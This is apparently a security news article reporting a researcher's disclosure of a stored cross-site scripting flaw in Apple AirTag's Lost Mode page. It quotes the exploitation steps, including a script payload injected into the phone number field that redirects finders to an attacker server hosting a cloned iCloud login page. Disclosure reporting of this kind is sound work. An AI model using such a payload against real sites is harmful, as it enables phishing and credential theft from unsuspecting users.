Weaponizing Apple AirTag to lure users to malicious sites

Pierluigi Paganini October 01, 2021

Threat actors could exploit a stored cross-site scripting (XSS) vulnerability in Apple AirTag product to lure users to malicious websites.

Security researcher Bobby Rauch discovered a stored cross-site scripting (XSS) vulnerability in the Apple AirTag product that can be exploited by attackers to lure users to malicious websites.

Apple AirTag is a tracking device designed to act as a key finder, it allows users to find personal objects (e.g. keys, bags, apparel, small electronic devices, vehicles).

Rauch, like other researchers recently, decided to disclose the vulnerability because Apple did not address it.

Apple AirTag Lost Mode allows a user to mark their device as missing if they have misplaced it. This generates a unique https://found.apple.com page, which the Airtag info (i.e. serial number, the phone number and message from the owner). In case an individual with an iPhone or Android device will find the missing Airtag, they can scan it using the NFC and opens the Airtag’s unique https://found.apple.com page on their device.

In the attack scenario described by the expert, an attacker enables “lost mode” for an AirTag and injects the malicious payload into the phone number field. When the victim will find the device and will scan it, the malicious payload is triggered immediately.

Rauch demonstrated the attack using a payload to redirect the victim to a fake iCloud login page.

Below is the process to exploit the issue that was described by the expert in a post published on Medium:

  1. An attacker sets their Airtag into lost mode.
  2. An attacker intercepts this request, and injects this malicious payload into the phone number field: <script>window.location=’https://10.0.1.137:8000/indexer.html’;var a = ‘’;</script>
  3. A victim then discovers the lost Airtag. They open up their Find My app, and scan the Airtag.
  4. This opens up the generated https://found.apple.com page. The victim is immediately redirected to the malicious attacker page, which is a direct clone of one of the iCloud.com login pages.
  5. The victim enters their iCloud credentials, which are immediately exfiltrated to the attacker’s server.

The same vulnerability could be exploited in multiple ways, for example, redirecting the users to a website designed to serve malware.

“Since Airtags were recently released, most users would be unaware that accessing the https://found.apple.com page doesn’t require authentication at all. The https://found.apple.com link can also be used as a phishing link, and shared via a desktop/laptop, without the need for a mobile device to scan the Airtag. Further injection attacks could occur through the Find My App, which is used to scan third-party devices that support “Lost Mode” as part of Apple’s Find My network.” concludes the expert.

Follow me on Twitter: @securityaffairs and Facebook

[adrotate banner=”9″][adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – hacking, AirTag)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment